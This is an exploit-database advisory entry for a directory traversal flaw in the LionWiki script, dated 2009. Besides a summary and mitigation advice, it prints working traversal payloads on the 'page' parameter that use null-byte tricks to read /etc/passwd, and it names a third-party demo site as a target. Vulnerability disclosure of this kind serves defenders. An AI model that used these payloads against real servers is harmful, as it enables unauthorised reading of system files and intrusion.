header-logo
Suggest Exploit
vendor:
LionWiki
by:
MoDaMeR
5
CVSS
MEDIUM
Directory Traversal
22
CWE
Product Name: LionWiki
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2009

Powered by LionWiki

The LionWiki script is vulnerable to directory traversal attacks. An attacker can exploit this vulnerability by manipulating the 'page' parameter in the index.php file to access files outside of the intended directory structure. This can lead to the disclosure of sensitive information such as the /etc/passwd file.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and implement proper input validation and output encoding. Additionally, access controls should be implemented to restrict unauthorized access to sensitive files.
Source

Exploit-DB raw data:

script home site :0 http://lionwiki.0o.cz/

script name := Powered by LionWiki

exploit :-
index.php?page= ../../../../../../../../etc/passwd%00.jpg
index.php?page= ../../../../../../../../etc/passwd%00.htm
index.php?page= ../../../../../../../../etc/passwd%00.html

demo site :-
http://wiki.tlapicka.net/index.php

------------------------------------------
found by MoDaMeR
Islamic ghosts Team

Gr33tz:- all muslum hackerz ,all my freind 

# milw0rm.com [2009-07-10]